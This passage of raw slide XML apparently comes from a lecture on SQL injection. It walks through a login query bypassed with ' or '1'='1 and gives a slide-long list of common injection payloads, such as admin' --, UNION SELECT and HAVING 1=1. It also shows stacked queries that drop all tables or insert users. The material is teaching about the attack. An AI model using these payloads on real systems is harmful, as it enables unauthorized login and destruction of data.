              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zriha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND 	            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>username:zriha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>, password: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
              <a:t> '1'='1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>SQL statement: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zriha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	            password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> '1'='1';</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13</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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503238" y="836613"/>
            <a:ext cx="8229600" cy="792162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>SQL injection – list of common attacks</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55301" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="357188" y="1700213"/>
            <a:ext cx="1235075" cy="47704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a:t>' or '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 'x'='x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 0=0 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or 0=0 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>or 0=0 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 0=0 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or 0=0 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>or 0=0 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 'x'='x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or "x"="x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>') or ('x'='x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or a=a--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or "a"="a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>') or ('a'='a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55302" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1835150" y="1700213"/>
            <a:ext cx="1920875" cy="47704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a:t>") or ("a"="a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>hi" or "a"="a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>hi" or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>hi' or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>'or'1=1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>and 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>and 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 'one'='one--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 'one'='one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' and 'one'='one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' and 'one'='one--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>1') and '1'='1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>admin' --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>admin' #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>admin'/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>or 1=1--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55303" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3995738" y="1700213"/>
            <a:ext cx="1344612" cy="47704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a:t>or 1=1#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>or 1=1/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>) or '1'='1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>) or ('1'='1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or '1'='1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 'x'='x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 0=0 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or 0=0 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>or 0=0 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 0=0 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or 0=0 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>or 0=0 #</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 'x'='x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or "x"="x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>') or ('x'='x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or 1=1--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55304" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5616575" y="1700213"/>
            <a:ext cx="3419475" cy="47704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cs-CZ"/>
              <a:t>or 1=1--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' or a=a--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>" or "a"="a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>') or ('a'='a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>") or ("a"="a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>hi" or "a"="a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>hi" or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>hi' or 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>'or'1=1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>1234' AND 1=0 UNION ALL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>	SELECT 'admin'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' HAVING 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>' GROUP BY table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>	columnfromerror1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>	HAVING 1=1 --</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>@@version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>select @@version</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" alt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14</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-C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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>SQL injection jokes</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88068" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2525072" y="6165304"/>
            <a:ext cx="66189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dirty="0" smtClean="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>://hackaday.com/2014/04/04/sql-injection-fools-speed-traps-and-clears-your-record/</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="12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15</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://hackadaycom.files.wordpress.com/2014/04/18mpenleoksq8jpg.jpg?w=636"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-588" t="8523" r="158" b="13038"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1576038" y="1881224"/>
            <a:ext cx="6084000" cy="356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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Database is typically not read-only</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87044" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="849313" y="4173538"/>
            <a:ext cx="5594350" cy="1200150"/>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cs-CZ">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE name = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zriha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x'; DROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALL TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" b="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87045" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="2565400"/>
            <a:ext cx="6342062" cy="1200150"/>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cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zriha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> AND </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x'; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO users values (‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a’,’b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’, …) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
